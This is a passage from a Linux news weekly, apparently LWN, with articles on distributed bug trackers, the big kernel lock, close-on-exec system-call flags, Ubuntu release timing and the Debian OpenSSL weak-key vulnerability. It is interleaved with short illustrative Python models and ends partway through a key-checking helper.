into the SCM.  If a bug is fixed, committing the fix and the bug tracker
update at the same time makes sense; in cases where one is trying to add
comments to a bug as part of an ongoing conversation the required commit is
just more work to do.  The fact that, in git at least, one must explicitly
add any new files created by the bug tracker (which have names like
12968ab9-5344-4f08-9985-ef31153e504f/comments/97f56c43-4cf2-4569-9ef4-3e8f2d9eb1fe/body)
does not help the situation.


Beyond that, tracking bugs this way creates two independent sets of
metadata - the bug information itself, and whatever the developer added
when committing changes.  There is currently no way of tying those two
metadata streams together.  Then, there is the issue of merging.  Bugs
Everywhere appears to reflect some thought about this problem; most changes
involve the creation of new, (seemingly) randomly-named files which will not
create conflicts at merge time.  It did not take long, however, for your
editor to prove that changing the severity of a bug in two branches and
merging the result creates a conflict which can only be resolved by
hand-editing the bug tracker's files.  Said files are plain text, but that
is less comforting than one might think.
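
The difference between the two cases can be modeled in a few lines.  This is
a toy, not Bugs Everywhere's actual storage format or git's merge algorithm:
the "values" file name, the severity strings, and the whole-file three-way
merge are assumptions chosen only to show why randomly-named comment files
merge cleanly while a single shared settings file does not.

```python
import uuid


def add_comment(tree, bug, text):
    """Return a copy of tree with a comment stored under a fresh random name."""
    new_tree = dict(tree)
    new_tree[f"{bug}/comments/{uuid.uuid4()}/body"] = text
    return new_tree


def set_severity(tree, bug, severity):
    """Return a copy of tree with the bug's single settings file rewritten."""
    new_tree = dict(tree)
    new_tree[f"{bug}/values"] = f"severity={severity}\n"
    return new_tree


def three_way_merge(base, ours, theirs):
    """Whole-file three-way merge; returns (merged tree, conflicting paths)."""
    merged, conflicts = {}, []
    for path in sorted(set(base) | set(ours) | set(theirs)):
        b, o, t = base.get(path), ours.get(path), theirs.get(path)
        if o == t:        # both sides agree (or both left it alone)
            result = o
        elif o == b:      # only "theirs" changed it
            result = t
        elif t == b:      # only "ours" changed it
            result = o
        else:             # both sides changed it, differently
            conflicts.append(path)
            continue
        if result is not None:
            merged[path] = result
    return merged, conflicts


base = {"bug1/values": "severity=minor\n"}
ours = add_comment(set_severity(base, "bug1", "serious"), "bug1", "seen on amd64")
theirs = add_comment(set_severity(base, "bug1", "critical"), "bug1", "seen on arm")

merged, conflicts = three_way_merge(base, ours, theirs)
comment_count = sum(1 for path in merged if "/comments/" in path)
print(conflicts, comment_count)
```

Both comments survive the merge because no two branches ever write the same
path; the severity change collides because both branches rewrote the one file
that holds it.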


All of this can make distributed bug tracking look like a source of more
work for developers, which is not the path to world domination.  What is
needed, it seems, is a combination of more advanced tools and better
integration with the underlying SCM.  Bugs Everywhere, by trying to work
with any SCM, risks not being easily usable with any of them. 


A project which is trying for closer integration is ticgit, which, as one
might expect, is based on git.  Ticgit takes a different approach, in that
there are no files added to the project's source tree, at least not
directly; instead, ticgit adds a new branch to the SCM and stores the bug
information there.  That allows the bug database to travel with the source
(as long as one is careful to push or pull the ticgit branch!) while keeping the
associated files out of the way.  Ticgit operations work on the git object
database directly, so there is no need for separate commit operations.  On
the other hand, this approach loses the ability to have a separate view of
the bug database in each branch; the connection between bug fixes and bug
tracker changes has been made weaker.  This is something which can be
fixed, and it would appear (from comments in the source) that dealing with
branches is on the author's agenda.


Ticgit clearly has potential, but even closer integration would be
worthwhile.  Wouldn't it be nice if a git commit command would
also, in a single operation, update the associated entry in the bug
database?  Interested developers could view a commit which is alleged to
fix a bug without the need for anybody to copy commit IDs back and forth.
Reverting a bugfix commit could automatically reopen the bug.  And so on.
In the long run, it is hard to see how a truly integrated, distributed bug
tracker can be implemented independently of the source code management
system.


There are some other development projects in this area, including:


 Scmbug is a relatively 
     advanced project which aims "to solve the integration problem once and
     for all."  It is not truly a distributed bug tracker, though; it
     depends on hooks into the SCM which talk to a central server.
     Regardless, this project has done a significant amount of thinking
     about how bug trackers and source code management systems should work
     together.

 DisTract is a
     distributed bug tracker which works through a web interface.  To that
     end, it uses a bunch of Firefox-specific JavaScript code to run local
     programs, written 
     in Haskell, which manipulate bug entries stored in a Monotone
     repository.  Your editor confesses that he did not pull together all
     of the pieces needed to make this tool work.

 DITrack is a set of Python
     scripts for manipulating bug information within a Subversion
     repository.  It is meant to be distributed (and, eventually,
     "backend-agnostic"), but its use of Subversion limits how distributed
     it can be for now.

 Ditz is a set of Ruby scripts
     for manipulating bug information within a source code management
     system; it has no knowledge of the SCM itself.


As can be seen, there is no shortage of work being done in this area,
though few of these projects have achieved a high level of usability.  Only
Scmbug has been widely deployed so far.  A few of these projects have the
potential to change the way development is done, though, once various
integration and user interface issues are addressed.

There is one remaining problem, though, which has not been touched upon
yet.  A bug tracker serves as a sort of to-do list for developers, but
there is more to it than that.  It is also a focal point for a conversation
between developers and users.  Most users are unlikely to be impressed by a
message like "set up a git repository and run these commands to file or
comment on a bug."  There is, in other words, value in a central system
with a web interface which makes the issue tracking system accessible to a
wider community.  Any distributed bug tracking system which does not
facilitate this wider conversation will, in the end, not be successful.
Creating a distributed tracker which also works well for users could be the
biggest challenge of them all.

		The big kernel lock strikes again


When Alan Cox first made Linux work on multiprocessor systems, he added a
primitive known as the big kernel lock (or BKL).  This lock, originally,
ensured that only one processor could be running kernel code at any given
time.  Over the years, the role of the BKL has diminished as increasingly
fine-grained locking - along with lock-free algorithms - has been
implemented throughout the kernel.  Getting rid of the BKL entirely has
been on the list of things to do for some time, but progress in that
direction has been slow in recent years.  A recent performance regression
tied to the BKL might give some new urgency to that task, though; it also
shows how subtle algorithmic changes can make a big difference.


The AIM benchmark attempts to measure system throughput by running a large
number of tasks (perhaps thousands of them), each of which is exercising
some part of the kernel.  Yanmin Zhang reported that his AIM results got about 40%
worse under the 2.6.26-rc1 kernel.  He took the trouble to bisect the
problem; the guilty patch turned out to be the generic semaphores code.
Reverting that patch made the performance regression go away - at the cost
of restoring over 7,000 lines of old, unlamented code.  The thought of
bringing back the previous semaphore implementation was enough to inspire a
few people to look more deeply at the problem.


It did not take too long to narrow the focus to the BKL, which was converted to a semaphore a few
years ago.  That part of the process was easy - there aren't a whole lot of
other semaphores left in the kernel, especially in performance-critical
places.  But the BKL stubbornly remains in a number of core places,
including the fcntl() system call, a number of ioctl()
implementations, the TTY code, and open() for char devices.
That's enough for a badly-performing BKL to create larger problems,
especially when running VFS-heavy benchmarks with a lot of contention.


Ingo Molnar tracked down the problem in the
new semaphore code.  In short: the new semaphore code is too fair for its
own good.  When a semaphore is released, and there is another thread
waiting for it, the semaphore is handed over to the new thread (which is
then made runnable) at that time.  This approach ensures that threads
obtain the semaphore in something close to the order in which they asked
for it.


The problem is that fairness can be expensive.  The thread waiting for the
semaphore may be on another processor, its cache could be cold, and it
might be at a low enough priority that it will not even begin running for
some time.  Meanwhile, another thread may request the semaphore, but
it will get put at the end of the queue behind the new owner, which may not
be running yet.  The result is a certain amount of dead time where no
running thread holds the semaphore.  And, in fact, Yanmin's
experience with the AIM benchmark showed this: his system was running idle
almost 50% of the time.


The solution is to bring in a technique from the older semaphore code: lock
stealing.  If a thread tries to acquire a semaphore, and that semaphore is
available, that thread gets it regardless of whether a different thread is
patiently waiting in the queue.  Or, in other words, the thread at the head
of the queue only gets the semaphore once it starts running and actually
claims it; if it's too slow, somebody else might get there first.  In human
interactions, this sort of behavior is considered impolite (in some
cultures, at least), though it is far from unknown.  In a multiprocessor
computer, though, it makes the difference between acceptable and
unacceptable performance - even a thread which gets its lock stolen will
benefit in the long run.
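
The two policies differ only in what happens at release time.  The following
is a single-threaded toy model of the bookkeeping, not the kernel's
semaphore code; the class, its fields, and the thread names are invented for
illustration.  With strict handoff, a sleeping waiter owns the semaphore
before it has run; with stealing, the semaphore is simply marked free and
whoever asks first gets it.

```python
from collections import deque


class ToySemaphore:
    """Single-threaded model of a binary semaphore's bookkeeping."""

    def __init__(self, allow_stealing):
        self.allow_stealing = allow_stealing
        self.available = True
        self.owner = None
        self.waiters = deque()   # FIFO queue of thread names that are asleep

    def down(self, thread):
        """Take the semaphore if it is available; otherwise join the queue."""
        if self.available:
            self.available = False
            self.owner = thread
            if thread in self.waiters:
                self.waiters.remove(thread)
            return True
        if thread not in self.waiters:
            self.waiters.append(thread)
        return False

    def up(self):
        """Release the semaphore."""
        self.owner = None
        if self.waiters and not self.allow_stealing:
            # Fair handoff: the head waiter owns the semaphore immediately,
            # even though it has not been scheduled yet.
            self.owner = self.waiters.popleft()
        else:
            # Stealing allowed: mark it free; a woken waiter must call
            # down() again and may find that somebody else got there first.
            self.available = True


def contended_release(allow_stealing):
    """A holds, B sleeps, A releases, then running thread C asks first."""
    sem = ToySemaphore(allow_stealing)
    sem.down("A")
    sem.down("B")            # B queues up and goes to sleep
    sem.up()                 # A releases before B has been scheduled
    c_succeeded = sem.down("C")
    return c_succeeded, sem.owner


fair = contended_release(allow_stealing=False)
stealing = contended_release(allow_stealing=True)
print(fair, stealing)
```

In the fair case the semaphore belongs to B, which is not yet running, while
C (which is running) has to go to sleep: that is the dead time described
above.  In the stealing case C proceeds at once and B retries when it wakes.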


Interestingly, the patch which implements this change was merged into the
mainline, then reverted before 2.6.26-rc2 came out.  The initial reason for the
revert was that the patch broke semaphores in other situations; for some
usage patterns, the semaphore code could fail to wake a thread when the
semaphore became available.  This bug could certainly have been fixed, but
it appears that things will not go that way - there is a bit more going on
here.


What is happening instead is that Linus has committed a patch which simply
turns the BKL into a spinlock.  By shorting out the semaphore code
entirely, this patch fixes the AIM regression while leaving the slow (but
fair) semaphore code in place.  This change also makes the BKL
non-preemptible, which will not be entirely good news for those who are
concerned with latency issues - especially the real time tree. 

The reasoning behind this course of action would appear to be this: both
semaphores and the BKL are old, deprecated mechanisms which are slated for
minimization (semaphores) or outright removal (BKL) in the near future.
Given that, it is not worth adding more complexity back into the semaphore
code, which was dramatically simplified for 2.6.26.  And, it seems, Linus
is happy with a sub-optimal BKL:


	Quite frankly, maybe we _need_ to have a bad BKL for those to ever
	get fixed. As it was, people worked on trying to make the BKL
	behave better, and it was a failure. Rather than spend the effort
	on trying to make it work better (at a horrible cost), why not just
	say "Hell no - if you have issues with it, you need to work with
	people to get rid of the BKL rather than cluge around it".


So the end result of all this may be a reinvigoration of the effort to
remove the big kernel lock from the kernel.  It still is not something
which is likely to happen over the next few kernel releases: there is a lot
of code which can subtly depend on BKL semantics, and there is no way to be
sure that it is safe without auditing it in detail.  And that is not a
small job.  Alan Cox has been reworking the TTY code for some time, but he
has some ground to cover yet - and the TTY code is only part of the
problem.  So the BKL will probably be with us for a while yet.

		Extending system calls


Getting an interface right is a hard, but necessary, task, especially when
that interface has to be supported "forever".  Such is the case with the
system call interface that the kernel presents to user space, so adding
features to it must be done
very carefully.  Even so, when Ulrich Drepper set out to remove a hole that could lead to a
race condition, he probably did not expect all the different paths that
would need to be tried before closing in on an acceptable solution.


The problem stems from wanting to be able to create file descriptors with
new properties—things like close-on-exec, non-blocking, or
non-sequential descriptors.  Those features were not considered when the
system call interface was developed.  After all, many of those system calls
are essentially unchanged from early Unix implementations of the 1970s.
The open() call is the most obvious way to request a file descriptor
from the kernel, but there are plenty of others.


In fact, open() is one of the easiest to extend with new
features because of its flags argument.  Calls like
pipe(), socket(), accept(),
epoll_create() and others produce file descriptors as well, but don't
have a flags argument available.  Something different would have
to be done to support additional features for the file descriptors
resulting from those calls.


The close-on-exec functionality is especially important to close a security
hole for multi-threaded programs.  Currently, programs can use 
fcntl() to change an open file descriptor to have the close-on-exec property,
but there is always a window in time between the creation of the descriptor and
changing its behavior.  Another thread could do an exec() call in
that window, leaking a potentially sensitive file descriptor into the newly
run program.  Closing that window requires an in-kernel solution.
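
The window can be made visible with a short, Linux-oriented sketch.  Python
already marks every descriptor it creates as close-on-exec, so the code below
first undoes that with os.set_inheritable() to imitate what a plain C open()
returns; that step, the helper names, and the use of os.devnull are
assumptions made purely for illustration.

```python
import fcntl
import os


def is_cloexec(fd):
    """Report whether the close-on-exec flag is set on fd."""
    return bool(fcntl.fcntl(fd, fcntl.F_GETFD) & fcntl.FD_CLOEXEC)


def open_then_fcntl(path):
    """Two-step approach: create the descriptor, then mark it."""
    fd = os.open(path, os.O_RDONLY)
    os.set_inheritable(fd, True)      # imitate a plain C open(): flag clear
    # An exec() in another thread at this point would inherit fd.
    exposed = not is_cloexec(fd)
    flags = fcntl.fcntl(fd, fcntl.F_GETFD)
    fcntl.fcntl(fd, fcntl.F_SETFD, flags | fcntl.FD_CLOEXEC)
    return fd, exposed


def open_atomic(path):
    """One-step approach: the kernel sets the flag as it creates fd."""
    return os.open(path, os.O_RDONLY | os.O_CLOEXEC)


fd, exposed = open_then_fcntl(os.devnull)
two_step_ok = is_cloexec(fd)
safe_fd = open_atomic(os.devnull)
atomic_ok = is_cloexec(safe_fd)
os.close(fd)
os.close(safe_fd)
print(exposed, two_step_ok, atomic_ok)
```

Both descriptors end up with the flag set; the difference is that only the
two-step version ever exists without it.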


Back in June of last year, after some false starts, Linus Torvalds suggested adding an
indirect() system call, as a way to pass flags to system calls
that don't currently support them.  The indirect() call would
apply a set of flags to the invocation of an existing system call.  This
would allow existing calls to remain unchanged, with only new uses calling
indirect().  User space programs would be unlikely to call the new
function directly; instead, they would call glibc functions that
handled any necessary
indirect() calls.


Davide Libenzi created a sys_indirect() patch in July, but Drepper
saw it as "more complex than warranted".  So Drepper created his own "trivial"
implementation, which was described on this page in
November.  It was met with a less than enthusiastic response on
linux-kernel for being, amongst other things, an exceedingly ugly
interface.  


The alternative to sys_indirect() is to create a new system call
for each existing call that needed a flags argument.  This was seen as
messy by some, including Torvalds, leading some kernel hackers into looking for alternatives.  The indirect approach
also had some other potential benefits, though, because it was seen as something that
could be used by syslets to
allow asynchronous system calls.  No decision seemed to be forthcoming,
leading Drepper to ask Torvalds for one:

Will you please make a decision regarding sys_indirect?  There has been
no other proposal so the alternative is to add more syscalls.


To bolster his argument that sys_indirect() was the way to go,
Drepper also created a patch to add some of
the required system calls.   He started with the socket()
family, by adding socket4(), socketpair5(), and
accept4()—tacking the number of arguments onto the function
name a la wait3() and wait4().  Drepper's intent may not
have been well served by choosing those calls, as Alan Cox immediately noted
that the type argument could be overloaded:

Given we will never have 2^32 socket types, and in a sense this is part
of the type why not just use

that would be far far cleaner, no new syscalls on the socket side at all.
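
The idea of folding a flag into the socket type can be sketched as follows.
This is an illustration on a current Linux system, not the code from the
quoted message: SOCK_CLOEXEC is the name that Linux and Python's socket
module use for such a flag today, and its use here is an assumption about
what the overloading would look like.

```python
import fcntl
import socket

# The flag occupies a bit far above any real socket type value, so it can
# share the type argument without ambiguity.
requested_type = socket.SOCK_STREAM | socket.SOCK_CLOEXEC

sock = socket.socket(socket.AF_INET, requested_type)
fd_flags = fcntl.fcntl(sock.fileno(), fcntl.F_GETFD)
close_on_exec = bool(fd_flags & fcntl.FD_CLOEXEC)

# Masking the flag back out recovers the plain socket type.
base_type = requested_type & ~socket.SOCK_CLOEXEC
sock.close()
print(close_on_exec, base_type == socket.SOCK_STREAM)
```

Python sets close-on-exec on new sockets regardless, so the explicit flag is
redundant there; the point is only the calling convention, in which no new
system call or extra argument is needed.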


Michael Kerrisk looked over the set of system calls that generate file
descriptors, categorizing them based on whether they needed a
flag argument added.  He observed that roughly half of the file
descriptor producing calls need not change, for one of three reasons: they
could use an overloading trick like the socket calls, the glibc API had
already added a flags argument, or alternatives were available that provide
the same functionality along with flags.


In response, Drepper made one last attempt to push the indirect approach,
saying:

Or we just add sys_indirect (which is also usable for other syscall
extensions, not just the CLOEXEC stuff) and let userlevel (i.e., me)
worry about adding new interfaces to libc.  As you can see, for the more
recent interfaces like signalfd I have already added an additional
parameter so the number of interface changes would be reduced.


Even though the indirect approach has some good points, Torvalds liked the
approach advocated by Cox, saying:

Ok, I have to admit that I find this very appealing. It looks much
cleaner, but perhaps more importantly, it also looks both readable and
easier to use for the user-space programmer.


Ultimately, developers will only use these new interfaces if they can
easily test for the existence of the new code.  Torvalds gives an example
of how that might be done using the O_NOATIME flag to
open(), which has only been available since 2.6.8.  It is this
testability issue that makes him believe the flags-based approach is the
right one:

And that's the problem with anything that isn't flags-based. Once you do
new system calls, doing the above is really quite nasty. How do you
statically even test that you have a system call? Now you need to add a
whole autoconf thing for it existing, and when it does exist you still
need to test whether it works, and you can't even do it in the slow-path
like the above (which turns the failure into a fast-path without the
flag).


This new approach, with a scaled down number of new system calls rather
than adding a general-purpose system call extension mechanism like
sys_indirect(), is now being pursued by Drepper.  In the explanatory patch
at the start of the series, he lays out which of the system calls will
require a new user space interface: paccept(), epoll_create2(), dup3(),
pipe2(), and inotify_init1(), as well as those that do not: signalfd4(),
eventfd2(), timerfd_create(), socket(), and socketpair().


Drepper has already made
several iterations of patches addressing most of the concerns expressed by
the kernel developers along the way.  There have been some architecture
specific problems, but Drepper has been knocking those down as well.  If no
further roadblocks appear, it would seem a likely candidate for inclusion
in 2.6.27.


		Release synchronization


For those who have not seen it, Mark Shuttleworth's recent The Art of Release
posting is worth a look.  He starts with some rather self-congratulatory
talk about the Ubuntu 8.04 release, saying:


	To the best of my knowledge there has never been an "enterprise
	platform" release delivered exactly on schedule, to the day, in any
	proprietary or Linux OS. 


One could quibble with this claim in a number of ways, but it is true that
Ubuntu got out a release designed to be supported for a number of years,
and they did it when they said they would.  That, of course, is only part
of the job; now they have to follow through on that little promise of
supporting this distribution into 2011.  The initial signs
are good: Ubuntu's support thus far has been solid, and it would appear
that the distribution will not be going away anytime soon. 

One might well question whether the timely release of 8.04 is noteworthy.
As a community we are increasingly spoiled; an increasingly large number of
projects and distributions manage to get out regular releases on a
reasonably predictable schedule.  Even kernel releases, once known to slip
for a year or more, are now predictable to within a couple of weeks.  Now
that free software releases are rather more predictable and reliable than,
say, airline departures, why is the Ubuntu 8.04 release noteworthy?

The answer is the long-term support commitment.  Theoretically, a
distribution intended for this sort of long lifetime will have had a degree
of extra care put into its preparation.  Important components will have
been given extra time to stabilize so that the distribution will be more
reliable from the outset.  Some thought will have gone into the selection
of packages shipped with an emphasis on supportability over the long term.
The whole process requires more effort and a higher degree of assurance
that all of the pieces are truly ready.

The degree to which Ubuntu has done all of that work should become clear
over time.  Certainly the software selected for this release is rather less
seasoned than the packages found in a Red Hat or SUSE enterprise release.
But "older" does not necessarily mean "better" or "more stable," so the
real proof will be in how well this distribution holds up for the next
three years.

Meanwhile, Mr. Shuttleworth has already stated that the next long-term
support release will be happening in April, 2010.  Ubuntu's success with
8.04, he says, allows this commitment to be made almost two years in
advance.  There is, however, a possibility that things could change:


	There's one thing that could convince me to change the date of the
	next Ubuntu LTS: the opportunity to collaborate with the other,
	large distributions on a coordinated major / minor release
	cycle. If two out of three of Red Hat (RHEL), Novell (SLES) and
	Debian are willing to agree in advance on a date to the nearest
	month, and thereby on a combination of kernel, compiler toolchain,
	GNOME/KDE, X and OpenOffice versions, and agree to a six-month and
	2-3 year long term cycle, then I would happily realign Ubuntu's
	short and long-term cycles around that.


This idea is not new, but Mr. Shuttleworth seems to be particularly
attached to it.  There is no doubt that there would be advantages to
aligning schedules in this way.  The kernel developers, who have been known
to make a special effort for a release destined to be used by a major
enterprise distributor, could focus especially hard on a stable release
knowing that it would be widely used.  Higher-level projects could do the
same.  The distributors could also, perhaps, find a way to collaborate on
the long-term maintenance of these components, rather than duplicating the
effort of backporting patches into older code.  Perhaps they could even get
together for a joint release party, saving even more money.

Or perhaps this is all a nice idea which fails to survive its encounter
with reality.  Enterprise distribution releases tend to be
highly-publicized events.  Ubuntu might be happy to share its limelight
with the larger distributors, but that feeling might not be reciprocated on
the other side.  It is hard to imagine Red Hat or Novell wanting to have
their big enterprise distribution release be just one of many happening
during the same month.

It is also hard to see Ubuntu making an agreement with the
enterprise distributors which specifies both a release date
and the versions of the major components.  8.04 released with the 2.6.24
kernel, which was almost exactly three months old at the time.  Red Hat
Enterprise Linux 5 released in mid-March, 2007, when the 2.6.20 kernel
was current - but Red Hat shipped the six-month-old 2.6.18 kernel instead.
Aligning schedules would require more than picking a date; it would also
require adopting similar stabilization periods.  It is far from clear that
Ubuntu would want to fall that far behind the leading edge for the sake of
alignment.

And, frankly, it's hard to imagine Debian making a credible commitment
(within one month) to a release date at all.

So aligned schedules for enterprise distributions seem like a hard
sell.  A better approach might be to try to wean these distributions off
the "freeze and backport" model of support; this model is expensive to
sustain, brings risks of its own, and doesn't always fit
the needs of enterprise customers.  If the enterprise distributors
were able to track more current software - rather than backporting pieces
of it into older software - better alignment of releases might just come
naturally.

		Debian, OpenSSL, and a lack of cooperation


A rather nasty security hole in the Debian OpenSSL package has generated a
lot of interest—along with a fair amount of controversy—amongst
Linux users.  The bug has been lurking for up to two years in Debian and other
distributions, like Ubuntu, based on it.  There are a number of lessons to
be learned here about distributions and projects working together or, as in
this case, failing to work together.


Back in April 2006, a Debian user reported a
problem using the OpenSSL library with valgrind, a tool that can check
programs for memory access problems.  It was reporting that OpenSSL was
using uninitialized memory in parts of the random number generator (RNG)
code.  Using memory before it is initialized to a known value is a well
known way to create hard-to-find bugs, so it is not surprising that the
valgrind report caused some consternation.


Debian hacker Kurt Roeckx tracked the problem down to what he thought were
two offending lines of code and posted a question on
the openssl-dev mailing list:

What I currently see as best option is to actually comment out
those 2 lines of code.  But I have no idea what effect this
really has on the RNG.  The only effect I see is that the pool
might receive less entropy.  But on the other hand, I'm not even
sure how much entropy some unitialised data has.

What do you people think about removing those 2 lines of code?


There were few responses, and none were opposed to removing the lines.
One of them came from Ulf
Möller, using an openssl.org email address: "If it helps
with debugging, I'm in favor of removing them."  Unfortunately, as
was discovered recently, while removing one of the two lines was harmless,
removing the other essentially crippled the RNG so that OpenSSL-generated
cryptographic keys were easy to predict.
(For more technical details on the bug and what should be done to respond to
it, see our article on this
week's Security page.)


It turns out, at
least according to OpenSSL core team member Ben Laurie, that openssl-dev is not for discussing
development of OpenSSL.  That may be true in practice, but the OpenSSL support web page describes
it as: "Discussions on development of the OpenSSL library. Not for
application development questions!"  In addition, the address
suggested by Laurie (openssl-team-AT-openssl.org) does not appear in any of
the OpenSSL
documentation or web pages.  If it wasn't the right place, it would seem
that the OpenSSL developers could have provided a helpful pointer to the right address, but that did not occur.


It probably was not clear that Roeckx was asking the questions in an
official Debian capacity, nor that he was planning to change the
Debian package based on the answer to his questions.  As Laurie rightly points out, he should
have submitted a patch, proposing that it be accepted into the upstream
OpenSSL codebase.  That probably would have garnered more attention, even
if it was only posted to openssl-dev.  It seems very unlikely that
the patch in question would have ever made it into an OpenSSL release. 


It is in the best interests of everyone, distributions, projects, and
users, for changes made downstream to make their way back upstream.  In
order for that to work, there must be a commitment by downstream
entities—typically distributions, but sometimes users—to push
their changes upstream.  By the same token, projects must actively
encourage that kind of activity by helping patch proposals and
proposers along.
First and foremost, of course, it must be absolutely clear where such
communications should take place.


Another recently reported security vulnerability also came about
because of a lack of cooperation between the project and distributions.  It
is vital, especially for core system security packages like OpenSSH and
OpenSSL, that upstream and downstream work very closely together.  Any
changes made in these packages need to be scrutinized carefully by the
project team before being released as part of a distribution's
package.  It is one thing to let some kind of ill-advised patch be made to
a game or even an office application package that many use; SSH and SSL form the
basis for many of the tools used to protect systems from attackers, so they
need to be held to a higher standard.


Another of Laurie's points, which also bears out the need for a higher
standard, is the timing of the check-in
to a public repository when compared to that of the advisory.
Any alert attacker could have made very good use of the five- or six-day
head start that monitoring the repository would have provided to exploit
the vulnerability.  While it is certainly possible that some of malicious
intent already knew about the flaw, though no exploits have been reported,
alerting potential attackers to this kind of hole well in advance of
alerting the
vulnerable users is unbelievably bad security protocol.


This is the kind of problem that could have been handled quickly and
quietly by all concerned.  All affected distributions—though it might
be difficult to list all of the Debian-derived distributions out
there—could have been contacted so that the advisory and updates to
affected packages could have been coordinated.  One of these days, one of
these problems is going to give Linux a security black eye unless the
community can do a better job of working together.


		Debian vulnerability has widespread effects


The recent
Debian advisory for OpenSSL could lead to predictable cryptographic
keys being generated on affected systems.  Unfortunately, because of the
way keys are used, especially by ssh, this can lead to problems on
systems that never installed the vulnerable library.  In addition, because the
OpenSSL library is used in a wide variety
of services that require cryptography, a very large subset of security
tools are affected.  This is a wide-ranging vulnerability that affects
a substantial fraction of Linux systems.


For a look at the chain of errors that led to the vulnerability, see
our front page article.
Here, we will concentrate on some of the details of the code, the impact of
the vulnerability, and what to do about it.


An excellent tool for finding memory-related bugs, Valgrind was used on an application that
used the OpenSSL library.  It complained about the library using
uninitialized memory in two locations in crypto/rand/md_rand.c:

While the lines of code look remarkably similar (modulo the pre-processor
directive), their actual effect is very different.


The first is contained in the ssleay_rand_add() function, which is
normally called via the RAND_add() function.  It adds the contents
of the passed in buffer to the entropy pool of the pseudo-random number
generator (PRNG).  The other is contained in ssleay_rand_bytes(),
normally called via RAND_bytes(),
which is meant to return random bytes.  It adds the contents
of the passed in buffer—before filling it with random bytes to return—to the entropy pool as well.  The major difference
is that removing the latter might marginally reduce the entropy in the PRNG
pool, while removing the former effectively stops any entropy from being
added to the pool.
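
The difference between the two removals can be illustrated with a toy model.  The sketch below is not OpenSSL's algorithm; the ToyPool class, its two flags, and the use of a small per-process value (called pid here) as the only other input are assumptions made purely for illustration.

```python
import hashlib


class ToyPool:
    """Toy stand-in for a PRNG entropy pool; NOT OpenSSL's real algorithm."""

    def __init__(self, mix_in_add=True, mix_in_bytes=True):
        self.state = b"\x00" * 20
        self.mix_in_add = mix_in_add      # models the update in the "add" path
        self.mix_in_bytes = mix_in_bytes  # models the update in the "bytes" path

    def add(self, buf: bytes) -> None:
        # Caller-supplied seed material; skipping this mix discards it entirely.
        if self.mix_in_add:
            self.state = hashlib.sha1(self.state + buf).digest()

    def random_bytes(self, buf: bytes, pid: int) -> bytes:
        # The caller's (possibly uninitialized) output buffer is only a bonus.
        extra = buf if self.mix_in_bytes else b""
        data = self.state + pid.to_bytes(4, "little") + extra
        self.state = hashlib.sha1(data).digest()
        return self.state


def first_output(seed: bytes, pid: int, **flags) -> bytes:
    """Seed a fresh pool, then ask it for its first block of output."""
    pool = ToyPool(**flags)
    pool.add(seed)
    return pool.random_bytes(b"", pid)
```

With mix_in_add=False, two completely different seeds yield identical output for the same pid, so the number of possible outputs is bounded by the number of possible pid values.  With only mix_in_bytes=False, the seed still reaches the pool and the outputs differ.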


For both RAND_add() and RAND_bytes(), the buffer that
gets passed in may not have been initialized.  This was evidently known by
the OpenSSL folks, but remained undocumented for others to trip over
later.  The "#ifndef PURIFY" is a clue that someone, at some
point, tried to handle the same kind of problem that Valgrind was reporting
for the similar, but proprietary, Purify tool.  While it isn't necessarily
wrong to add these uninitialized buffers to the PRNG pool, it is
something that tools like Valgrind will rightly complain about.  Since it
is dubious whether it adds much in the way of entropy, while constituting a
serious hazard for the uninitiated, some kind of documentation in the code
would seem mandatory. 


The major response from the OpenSSL team seems to be from core team member Ben Laurie's
weblog, where he has a rant entitled "Vendors Are
Bad For Security".  In it, and its follow-up, he makes some good points
about mistakes that were made, while seeming to be unwilling for OpenSSL to take any
share of the blame.


The end result is that OpenSSL would create predictable random numbers,
which would then result in predictable cryptographic keys.  According to
the advisory:

Affected keys include SSH keys, OpenVPN keys, DNSSEC keys, and key
material for use in X.509 certificates and session keys used in SSL/TLS
connections.  Keys generated with GnuPG or GNUTLS are not affected,
though.


A program
that can detect some weak keys has also been released.  It uses
256K hash values to detect the bad keys, which would imply 18 bits of
entropy in the PRNG pool of vulnerable OpenSSL libraries.  By using hashes
of the keys in the detection program, the authors do not directly give away the key
values that get generated, but it should not be difficult for an attacker
to generate and use that list.
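
The arithmetic behind the 18-bit figure is simple enough to check directly; the helper name below is made up for this sketch.

```python
import math


def entropy_bits(possible_values: int) -> float:
    """Bits needed to index `possible_values` equally likely outcomes."""
    return math.log2(possible_values)


blacklist_size = 256 * 1024          # "256K" hash values
bits = entropy_bits(blacklist_size)  # 2**18 == 262144, so 18 bits
```

For comparison, a key drawn from a healthy generator should be one of an astronomically larger number of possibilities, which is why a list of this size is practical to enumerate.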


For affected Debian-derived systems, the cleanup is relatively
straightforward, if painful.  The SSLkeys page on the Debian wiki
has specific information on how to remove weak keys along with how to
generate new ones for a variety of services affected.  Obviously, none of those steps should be taken until
the OpenSSL package itself has been upgraded to a version that fixes the hole.


A bigger problem may be for those installations based on distributions that
were not directly affected because they did not distribute the vulnerable
OpenSSL library.  Those machines may very well have weak keys installed in
user accounts as ssh authorized_keys.  A user who generated a key
pair on some vulnerable host may have copied the public key to a host that
was not vulnerable.  
This would allow an
attacker to access the account of that user by brute forcing the key from
the 256K possibilities.

Because of that danger, the
Debian project suspended
public key authentication on debian.org machines.  In addition, all
passwords were reset because of the possibility that an attacker could have
captured them by decrypting the ssh traffic using one of the weak keys.
One would guess that debian.org machines would have a higher incidence of
weak keys, but any host that allows users to use ssh public key
authentication is potentially at risk.


The weak key detector (dowkd) has some fairly serious limitations:

dowkd currently handles OpenSSH host and user keys and OpenVPN shared
secrets, as long as they use default key lengths and have been created
on a little-endian architecture (such as i386 or amd64).  Note that
the blacklist by dowkd may be incomplete; it is only intended as a
quick check.


In order to ensure that there are no weak keys installed as public keys on
other hosts, it may be necessary to remove all authorized_keys
(and/or authorized_keys2) entries for all users.  It may also be
wise to set all passwords to something unknown.  Until that is done, there
still remains a chance that a weak key may allow access to an attacker.  It
is an unpleasant task, but one that needs to be done by those who administer a multi-user system.
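
For administrators who want to audit before deleting everything, the check could be sketched roughly as follows.  This is not dowkd and does not use its blacklist format: the SHA-256 digest of the decoded key blob and the blacklist set are hypothetical choices for illustration, and a real audit should rely on the tools and lists published by the distribution.

```python
import base64
import hashlib


def key_fingerprint(line: str):
    """Return a hex digest of the key blob in one authorized_keys line, or None."""
    fields = line.split()
    for i, field in enumerate(fields[:-1]):
        # The key type (e.g. ssh-rsa, ssh-dss) precedes the base64 blob;
        # any options come before it and the comment comes after.
        if field.startswith(("ssh-", "ecdsa-")):
            try:
                blob = base64.b64decode(fields[i + 1], validate=True)
            except ValueError:
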